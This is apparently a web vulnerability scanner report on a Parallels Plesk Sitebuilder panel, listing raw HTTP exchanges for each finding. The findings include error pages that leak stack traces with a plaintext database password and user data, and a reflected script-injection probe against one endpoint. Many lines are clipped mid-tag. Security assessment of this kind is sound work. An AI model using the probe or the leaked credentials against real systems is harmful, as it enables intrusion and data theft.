[ownPagesets] => Base_ORM_Relation Object ( [_name:private] => ownPagesets [_type:private] => 2 [_className:private] => SB_ORM_Pageset [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownSiteFamilies] => Base_ORM_Relation Object ( [_name:private] => ownSiteFamilies [_type:private] => 2 [_className:private] => SB_ORM_SiteFamilia [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [customSettings] => Base_ORM_Relation Object ( [_name:private] => customSettings [_type:private] => 2 [_className:private] => SB_ORM_CustomSetting [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [moduleSettings] => Base_ORM_Relation Object ( [_name:private] => moduleSettings [_type:private] => 2 [_className:private] => SB_ORM_ModuleSettings [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) ) ) [_isModified:protected] => [_isNew:protected] => ) [siteFamilyBroker] => SB_ORM_SiteFamiliaBroker Object ( [_table:private] => Base_DB_Table Object ( [_db:protected] => Zend_Db_Adapter_Pdo_Mysql Object ( [_pdoType:protected] => mysql [_numericDataTypes ( [0] => 0 [1] => 1 [2] => 2 [INT] => 0 [INTEGER] => 0 [MEDIUMINT] => 0 [SMALLINT] => 0 [TINYINT] => 0 [BIGINT] => 1 [SERIAL] => 1 [DEC] => 2 [DECIMAL] => 2 [DOUBLE] => 2 [DOUBLE PRECISION] => 2 [FIXED] => 2 [FLOAT] => 2 ) [_config:protected] => Array ( [adapter] => PDO_MYSQL [host] => localhost [username] => seuser [password] => ppXiycZdP7 [dbname] => siteeditor [port] => 3306 [options] => Array ( [caseFolding] => 0 [autoQuoteIdentifiers] => 1 ) [driver_options] => Array ( ) ) [_fetchMode:protected] => 2 [_profiler:protected] => Zend_Db_Profiler Object ( [_queryProfiles:protected ( ) [_enabled:protected] => [_filterElapsedSecs [_filterTypes:protected] => ) [_defaultProfilerClass [_connection:protected] => PDO Object ( ) [_caseFolding:protected] => 0 [_autoQuoteIdentifiers ) [_schema:protected] => [_name:protected] => site_familia [_cols:protected] => Array ( [0] => id [1] => pageset_id [2] => template_category_id [3] => code [4] => uuid [5] => is_built_in [6] => user_id ) [_primary:protected] => Array ( [1] => id ) [_identity:protected] => 1 [_sequence:protected] => 1 [_metadata:protected] => Array ( [id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => id [COLUMN_POSITION] => 1 [DATA_TYPE] => int [DEFAULT] => [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => 1 [PRIMARY_POSITION] => 1 [IDENTITY] => 1 ) [pageset_id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => pageset_id [COLUMN_POSITION] => 2 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [template_category_id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => template_category_id [COLUMN_POSITION] => 3 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [code] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => code [COLUMN_POSITION] => 4 [DATA_TYPE] => varchar [DEFAULT] => [NULLABLE] => [LENGTH] => 255 [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [uuid] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => uuid [COLUMN_POSITION] => 5 [DATA_TYPE] => varchar [DEFAULT] => 0 [NULLABLE] => [LENGTH] => 100 [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [is_built_in] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => is_built_in [COLUMN_POSITION] => 6 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [user_id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => user_id [COLUMN_POSITION] => 7 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) ) [_metadataCache:protected [_rowClass:protected] => Base_DB_Table_Row [_rowsetClass:protected] => Base_DB_Table_Rowset [_referenceMap:protected] => Array ( ) [_dependentTables ( ) ) [_objectClassName [_defaultOrder:private] => ) [family] => ) ) ) [2] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 221 [function] => _getSiteFamily [class] => SB_Site_Processor [type] => :: ) [3] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 123 [function] => makeNew [class] => SB_Site_Processor [type] => :: ) [4] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 17 [function] => getSite [class] => SB_Helpers_Wizard_Site [type] => -> ) [5] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 63 [function] => prepare [class] => SB_Views_Wizard_Edit [type] => -> ) [6] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 55 [function] => __toString [class] => SB_XMLView [type] => -> ) ) ) ) ) ) </pre> </div> </body> </html> |
Severity: | High |
Confidence: | Certain |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Wizard/Edit/Modules |
GET /Wizard/Edit/Modules Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://vulnerarable.plesk.smb.10.2.0.site Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 22:18:09 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Internal Sitebuilder error</title> <style type="text/css"> td, .text { font-family: Verdana; font-size: 11px; } #stackTrace { background: #EEEEEE; width: 100%; position: absolute; left: 0px; top: 0px; filter: alpha(opacity=80); -moz-opacity: 0.8; opacity: 0.8; } #showStackTrace { position: absolute; left: 0px; top: 0px; } </style> </head> <body> <table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td width="100%" height="100%" align="center" valign="middle"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="60" rowspan="2" valign="top"> <img src="/images/unsupported </td> <td valign="middle" height="40" style="background: #EEEEEE; color: #606060;"> <center><b>Internal Sitebuilder error.</b></center> File: C:\Program Files (x86)\Parallels\Plesk <td width="7"><img src="/images/unsupported </tr> <tr> <td colspan="2" style="padding-top: 10px;"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td> <a href="#" onclick="javascript: history.back();"><b>Go back</b></a> </td> <td align="right"> <a href="mailto:bugreport </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <div id="showStackTrace"><a class="text" style="color: #F0F0F0; text-decoration: none;" href="#" onclick="document <div id="stackTrace" class="text" style="display: none;" onclick="document <pre><b>Stack trace:</b> Array ( [0] => Array ( [function] => SB_ExceptionHandler [args] => Array ( [0] => Base_SyntaxException Object ( [message:protected] => PHP Notice : Trying to get property of non-object [string:private] => [code:protected] => 8 [file:protected] => C:\Program Files (x86)\Parallels\Plesk [line:protected] => 276 [trace:private] => Array ( [0] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 48 [function] => handleError [class] => Base_SyntaxException [type] => :: ) [1] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 276 [function] => handleError [class] => Base_SyntaxException [type] => :: [args] => Array ( [0] => 8 [1] => Trying to get property of non-object [2] => C:\Program Files (x86)\Parallels\Plesk [3] => 276 [4] => Array ( [user] => SB_ORM_User Object ( [_isPasswordModified [validatorFailList [_data:protected] => Array ( [id] => 2 [parent_id] => 1 [plan_id] => 0 [role_id] => 4 [user_settings_id] => 2 [user_name] => admin_Guest [user_password] => [email] => [first_name] => [last_name] => [creation_date] => 2010-09-30T21:32:42-05:00 [auth_cookie] => [must_migrate] => 0 [uuid] => f7eca701-2829-833f-7d5d [password_algo] => 0 [password_salt] => ) [_rRepository:protected] => Base_ORM_RelationRep ( [_relations:private] => Array ( [settings] => Base_ORM_Relation Object ( [_name:private] => settings [_type:private] => 1 [_className:private] => SB_ORM_UserSettings [_parentField:private] => user_settings_id [_childField:private] => id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [parentUser] => Base_ORM_Relation Object ( [_name:private] => parentUser [_type:private] => 1 [_className:private] => SB_ORM_User [_parentField:private] => parent_id [_childField:private] => id [_cascade:private] => [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [role] => Base_ORM_Relation Object ( [_name:private] => role [_type:private] => 3 [_className:private] => SB_ORM_Role [_parentField:private] => role_id [_childField:private] => id [_cascade:private] => [_setNull:private] => [_arrayClassName:private] => [_value:private] => SB_ORM_Role Object ( [validatorFailList [_data:protected] => Array ( [id] => 4 [name] => Guest ) [_rRepository:protected] => Base_ORM_RelationRep ( [_relations:private] => Array ( ) ) [_isModified:protected] => [_isNew:protected] => ) [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [plan] => Base_ORM_Relation Object ( [_name:private] => plan [_type:private] => 3 [_className:private] => SB_ORM_Plan [_parentField:private] => plan_id [_childField:private] => id [_cascade:private] => [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [childReferences] => Base_ORM_Relation Object ( [_name:private] => childReferences [_type:private] => 2 [_className:private] => SB_ORM_UserReference [_parentField:private] => id [_childField:private] => parent_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [parentReferences] => Base_ORM_Relation Object ( [_name:private] => parentReferences [_type:private] => 1 [_className:private] => SB_ORM_UserReference [_parentField:private] => id [_childField:private] => child_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [children] => Base_ORM_Relation Object ( [_name:private] => children [_type:private] => 2 [_className:private] => SB_ORM_User [_parentField:private] => id [_childField:private] => parent_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownSites] => Base_ORM_Relation Object ( [_name:private] => ownSites [_type:private] => 2 [_className:private] => SB_Site [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownHosts] => Base_ORM_Relation Object ( [_name:private] => ownHosts [_type:private] => 2 [_className:private] => SB_ORM_Host [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownPlans] => Base_ORM_Relation Object ( [_name:private] => ownPlans [_type:private] => 2 [_className:private] => SB_ORM_Plan [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownPagesets] => Base_ORM_Relation Object ( [_name:private] => ownPagesets [_type:private] => 2 [_className:private] => SB_ORM_Pageset [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownSiteFamilies] => Base_ORM_Relation Object ( [_name:private] => ownSiteFamilies [_type:private] => 2 [_className:private] => SB_ORM_SiteFamilia [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [customSettings] => Base_ORM_Relation Object ( [_name:private] => customSettings [_type:private] => 2 [_className:private] => SB_ORM_CustomSetting [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [moduleSettings] => Base_ORM_Relation Object ( [_name:private] => moduleSettings [_type:private] => 2 [_className:private] => SB_ORM_ModuleSettings [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) ) ) [_isModified:protected] => [_isNew:protected] => ) [siteFamilyBroker] => SB_ORM_SiteFamiliaBroker Object ( [_table:private] => Base_DB_Table Object ( [_db:protected] => Zend_Db_Adapter_Pdo_Mysql Object ( [_pdoType:protected] => mysql [_numericDataTypes ( [0] => 0 [1] => 1 [2] => 2 [INT] => 0 [INTEGER] => 0 [MEDIUMINT] => 0 [SMALLINT] => 0 [TINYINT] => 0 [BIGINT] => 1 [SERIAL] => 1 [DEC] => 2 [DECIMAL] => 2 [DOUBLE] => 2 [DOUBLE PRECISION] => 2 [FIXED] => 2 [FLOAT] => 2 ) [_config:protected] => Array ( [adapter] => PDO_MYSQL [host] => localhost [username] => seuser [password] => ppXiycZdP7 [dbname] => siteeditor [port] => 3306 [options] => Array ( [caseFolding] => 0 [autoQuoteIdentifiers] => 1 ) [driver_options] => Array ( ) ) [_fetchMode:protected] => 2 [_profiler:protected] => Zend_Db_Profiler Object ( [_queryProfiles:protected ( ) [_enabled:protected] => [_filterElapsedSecs [_filterTypes:protected] => ) [_defaultProfilerClass [_connection:protected] => PDO Object ( ) [_caseFolding:protected] => 0 [_autoQuoteIdentifiers ) [_schema:protected] => [_name:protected] => site_familia [_cols:protected] => Array ( [0] => id [1] => pageset_id [2] => template_category_id [3] => code [4] => uuid [5] => is_built_in [6] => user_id ) [_primary:protected] => Array ( [1] => id ) [_identity:protected] => 1 [_sequence:protected] => 1 [_metadata:protected] => Array ( [id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => id [COLUMN_POSITION] => 1 [DATA_TYPE] => int [DEFAULT] => [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => 1 [PRIMARY_POSITION] => 1 [IDENTITY] => 1 ) [pageset_id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => pageset_id [COLUMN_POSITION] => 2 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [template_category_id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => template_category_id [COLUMN_POSITION] => 3 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [code] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => code [COLUMN_POSITION] => 4 [DATA_TYPE] => varchar [DEFAULT] => [NULLABLE] => [LENGTH] => 255 [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [uuid] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => uuid [COLUMN_POSITION] => 5 [DATA_TYPE] => varchar [DEFAULT] => 0 [NULLABLE] => [LENGTH] => 100 [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [is_built_in] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => is_built_in [COLUMN_POSITION] => 6 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) [user_id] => Array ( [SCHEMA_NAME] => [TABLE_NAME] => site_familia [COLUMN_NAME] => user_id [COLUMN_POSITION] => 7 [DATA_TYPE] => int [DEFAULT] => 0 [NULLABLE] => [LENGTH] => [SCALE] => [PRECISION] => [UNSIGNED] => [PRIMARY] => [PRIMARY_POSITION] => [IDENTITY] => ) ) [_metadataCache:protected [_rowClass:protected] => Base_DB_Table_Row [_rowsetClass:protected] => Base_DB_Table_Rowset [_referenceMap:protected] => Array ( ) [_dependentTables ( ) ) [_objectClassName [_defaultOrder:private] => ) [family] => ) ) ) [2] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 221 [function] => _getSiteFamily [class] => SB_Site_Processor [type] => :: ) [3] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 123 [function] => makeNew [class] => SB_Site_Processor [type] => :: ) [4] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 17 [function] => getSite [class] => SB_Helpers_Wizard_Site [type] => -> ) [5] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 63 [function] => prepare [class] => SB_Views_Wizard_Edit [type] => -> ) [6] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 55 [function] => __toString [class] => SB_XMLView [type] => -> ) ) ) ) ) ) </pre> </div> </body> </html> |
Severity: | High |
Confidence: | Certain |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /localizedimage.php |
GET /localizedimage.php?3b7b4"><script>alert(1)< Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 12 Oct 2010 01:44:52 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Internal Sitebuilder error</title> <style type="text/css"> td, .text { font-family: Verdana; font-size: 11px; } #stackTrace { background: #EEEEEE; width: 100%; position: absolute; left: 0px; top: 0px; filter: alpha(opacity=80); -moz-opacity: 0.8; opacity: 0.8; } #showStackTrace { position: absolute; left: 0px; top: 0px; } </style> </head> <body> <table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td width="100%" height="100%" align="center" valign="middle"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="60" rowspan="2" valign="top"> <img src="/images/unsupported </td> <td valign="middle" height="40" style="background: #EEEEEE; color: #606060;"> <center><b>Internal Sitebuilder error.</b></center> File: C:\Program Files (x86)\Parallels\Plesk <td width="7"><img src="/images/unsupported </tr> <tr> <td colspan="2" style="padding-top: 10px;"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td> <a href="#" onclick="javascript: history.back();"><b>Go back</b></a> </td> <td align="right"> <a href="mailto:bugreport </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <div id="showStackTrace"><a class="text" style="color: #F0F0F0; text-decoration: none;" href="#" onclick="document <div id="stackTrace" class="text" style="display: none;" onclick="document <pre><b>Stack trace:</b> Array ( [0] => Array ( [function] => SB_ExceptionHandler [args] => Array ( [0] => Zend_Exception Object ( [message:protected] => No entry is registered for key 'user' [string:private] => [code:protected] => 0 [file:protected] => C:\Program Files (x86)\Parallels\Plesk [line:protected] => 145 [trace:private] => Array ( [0] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 42 [function] => get [class] => Zend_Registry [type] => :: ) [1] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 29 [function] => get [class] => Base_Registry [type] => :: ) [2] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 36 [function] => __construct [class] => SB_UISettings [type] => -> ) [3] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 40 [function] => getInstance [class] => SB_UISettings [type] => :: ) [4] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 22 [function] => getLocaleName [class] => SB_Locale [type] => :: ) [5] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 9 [function] => getSection [class] => SB_Locale [type] => :: ) ) ) ) ) ) </pre> </div> </body> </html> |
Severity: | Low |
Confidence: | Firm |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | / |
GET / HTTP/1.1 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: /Login Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:07:17 GMT Connection: close |
Severity: | Low |
Confidence: | Firm |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Login |
GET /Login?returnUrl= Accept: */* Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: Keep-Alive Cookie: PHPSESSID=1032116979 |
HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 02:09:37 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> <h1>403 - Forbidden</h1> |
Severity: | Low |
Confidence: | Firm |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /NoCookies |
GET /NoCookies HTTP/1.1 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://vulnerarable.plesk.smb.10.2.0.site Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Tue, 12 Oct 2010 01:40:32 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>For correct operation of Site Editor, cookies must be enabled in your web browser.</title> <script type="text/javascript" src="/js/Sb.js?5.0.0 </head> <body> <script type="text/javascript"> Sb.Cookie.set('testCookie if ('test' == Sb.Cookie.get('testCookie document.location.href = "/Login"; } </script><table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0"><tr><td width="100%" height="100%" align="center" valign="middle"><table width="467" border="0" cellpadding="0" cellspacing="0"><tr> <td width="60"><img src="/images/unsupported <td width="400" valign="middle" height="40" align="center" style="background: #EEEEEE; color: #606060; font-family: Verdana; font-size: 11px; font-weight: bold;">For correct operation of Site Editor, cookies must be enabled in your web browser.<br>Please enable cookies in your browser.</td> <td width="7"><img src="/images/unsupported </tr></table></td></tr>< </body> </html> |
Severity: | Low |
Confidence: | Firm |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /UnsupportedBrowser |
GET /UnsupportedBrowser Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: keep-alive Referer: http://vulnerarable.plesk.smb.10.2.0.site Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: psaContext=domains; PHPSESSID=d9f3512785 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=23074cb14e P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 05:28:58 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>The browser is not supported.</title> <script type="text/javascript" src="/js/Sb.js?5.0.0 </head> <body> <script type="text/javascript"><! function continueAnyway() { Sb.Cookie.set('allow document.location.href = document.getElementById( } //--></script><input type="hidden" name="continueUrl" id="continueUrl" value="/Wizard/Edit/Html <tr> <td width="60"><img src="/images/unsupported <td width="400" valign="middle" height="40" align="center" style="background: #EEEEEE;">Unfortunately, your browser is not supported by Site Editor.<br>Please use Internet Explorer 5.5 or later, or Mozilla.</td> <td width="7"><img src="/images/unsupported </tr> <tr><td colspan="3" align="right" style="padding-top: 10px;"><a href="#" onclick="continueAnyway() </table></td></tr></table </body> </html> |
Severity: | Low |
Confidence: | Firm |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Wizard/ |
GET /Wizard/ HTTP/1.1 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:08:19 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link href="/skins/common.css?5 <link href="/skins/WinXPRe <link href="/skins/style_ext <link rel="shortcut icon" href="/favicon.ico?5.0.0 <script type="text/javascript" src="/js/externals <title>Overview - Parallels Small Business Panel</title> </head> <body onload="ProcessOnloa <script type="text/javascript"> if ('1' == '') { Sb.Console.enable(); } Sb.Cookie.set('testCookie if ('test' != Sb.Cookie.get('testCookie document.location.href = "/NoCookies"; } // define global variables sbSkinPath = '/skins/WinXPReloade sbBrowserEngine = 'MSIE'; sbBaseUrl = ''; sbVersion = '5.0.0'; sbBuild = '2009110318'; </script><script src="/js/locale.js?5.0.0 SbAppendLocaleKey( SbAppendLocaleKey( SbAppendLocaleKey('AJAX SbAppendLocaleKey('AJAX </script><div 